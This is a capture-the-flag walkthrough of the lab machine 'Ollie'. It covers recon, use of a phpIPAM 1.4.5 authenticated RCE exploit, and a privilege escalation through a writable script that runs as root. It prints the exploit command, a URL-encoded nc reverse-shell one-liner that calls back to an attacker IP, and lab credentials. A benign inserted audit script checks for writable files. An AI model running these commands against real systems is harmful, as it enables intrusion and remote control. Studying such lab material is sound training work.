Ollie

Target IP: 10.10.237.226

Challenge Description:
[Screenshot: challenge description]


Reconnaissance

[Screenshot: nmap scan output]
Performing an nmap scan shows there are three TCP ports open on the target machine, as shown above.

[Screenshot: aggressive nmap scan of the three open TCP ports]
Performing an aggressive nmap scan against the three open TCP ports returns the result above. I will start enumeration with the application on port 1337 first.


Enumeration

Port 1337: Application
[Screenshot: nc session to the application on port 1337]
I connected to the application on port 1337 on the target machine via nc. This application seems to provide the credentials admin:OllieUnixMontgomery! for an administration panel. The next step is to locate this administration panel.

Port 80: HTTP
[Screenshot: login page on port 80]
Browsing to this port displays the login webpage above. Can I use the credentials admin:OllieUnixMontgomery! here? Another interesting piece of information is that the application and version of this CMS are phpIPAM IP address management [v1.4.5].

[Screenshot: search result for phpIPAM 1.4.5 authenticated RCE]
I know phpIPAM 1.4.5 is vulnerable to authenticated RCE, as shown above. Before firing any exploits against the target machine, I wish to enumerate this machine further.

[Screenshot: successful login to phpIPAM]
Using the credentials admin:OllieUnixMontgomery!, I logged in successfully as shown above. I enumerated the application to find any useful files, but I did not find anything useful.


Exploitation

[Screenshot: exploit output and simple shell]
I downloaded the exploit from this link, and ran it against the target machine using the command python3 exp.py -url http://10.10.237.226/ -usr admin -pwd OllieUnixMontgomery! --shell. This exploit opened a simple shell that I can use to perform RCE, as shown above. Time to elevate this to a more stable reverse shell connection.

[Screenshot: reverse shell caught on port 8443]
I started a listener on port 8443 on my machine. Then, using the exploit's shell, I deployed the URL-encoded reverse shell script rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.14.55.153%208443%20%3E%2Ftmp%2Ff to the target machine and obtained a reverse shell connection on my machine on port 8443, as shown above. Now I have a foothold on the target machine with a session as www-data.


Privilege Escalation

[Screenshot: database credentials in /var/www/html/config.php]
The config.php located at /var/www/html contains the credentials phpipam_ollie:IamDah1337estHackerDog! of the database application running at port 3306. However, I am unable to connect to the database application.

[Screenshot: /etc/passwd and switching to the user ollie]
Running cat /etc/passwd shows there is a user called ollie. Trying to switch to this user ollie using the password IamDah1337estHackerDog! does not work; however, the password OllieUnixMontgomery! does, as shown above; this user likes to reuse their passwords. I successfully elevated my privileges from the user www-data to ollie. Time to obtain root privileges.

[Screenshot: writable files found with find]
Running the command find / -writable -type f 2>/dev/null shows an interesting entry called /usr/bin/feedme.

[Screenshot: permissions and contents of /usr/bin/feedme]
Running ls -la /usr/bin/feedme shows the user ollie has rw permissions. Using cat, I viewed the contents of this file and obtained the result above. This script is interesting.

[Screenshot: pspy64 output showing feedme executed as root]
I transferred pspy64 to the target machine and ran it, obtaining the interesting result above. It looks like the script feedme gets executed as the user root. From previous enumeration, I know I also have write permission over it, meaning I can put my reverse shell script inside it.
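As an added defender-side example, not from the original write-up, the POSIX shell script below audits for the misconfiguration behind this step: a script that a privileged job executes but that group or other users can modify (here /usr/bin/feedme was writable by ollie). It reports such files and applies the corrected permission; the directory list and the sample tree are assumptions.

```shell
#!/bin/sh
# Added audit helper (not part of the original write-up). It looks for regular
# files that group or other users can write, which is what let an unprivileged
# user replace the contents of a root-executed script. Directories passed on
# the command line are an assumption; the test tree is constructed.

# List regular files under the given directories that are group- or
# other-writable. One path per line; empty output means nothing was found.
find_loose_files() {
  find "$@" -type f \( -perm -g=w -o -perm -o=w \) -print 2>/dev/null
}

# Corrective action: strip the group/other write bits so only the owner edits.
harden_file() {
  chmod go-w "$1"
}

# Audit the given directories and report. Returns 0 when clean, 1 otherwise.
audit_script_dirs() {
  loose=$(find_loose_files "$@")
  if [ -z "$loose" ]; then
    echo "OK: no group/other-writable files under: $*"
    return 0
  fi
  echo "WARNING: files writable by non-owner (fix with chmod go-w):"
  echo "$loose"
  return 1
}

# Usage: sh audit.sh /usr/bin /usr/local/bin /etc/cron.d /etc/cron.hourly
if [ "$#" -gt 0 ]; then
  audit_script_dirs "$@"
fi
```

Run it over the directories that cron, systemd timers or sudo rules reference, since a writable file there is only a problem when something privileged executes it.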

[Screenshot: reverse shell script added to feedme, highlighted in green]
In the picture above, the text highlighted in green is the reverse shell script I put inside feedme. Then I started a listener on port 8444 on my machine to catch this shell.

[Screenshot: root reverse shell caught on port 8444]
And now I have a root reverse shell connection on port 8444, as shown in the bottom terminal of the picture above. Now I have root access on the target machine :)


Flags

[Screenshot: user.txt]
The user.txt flag is shown above.

[Screenshot: root.txt]
The root.txt flag is shown above.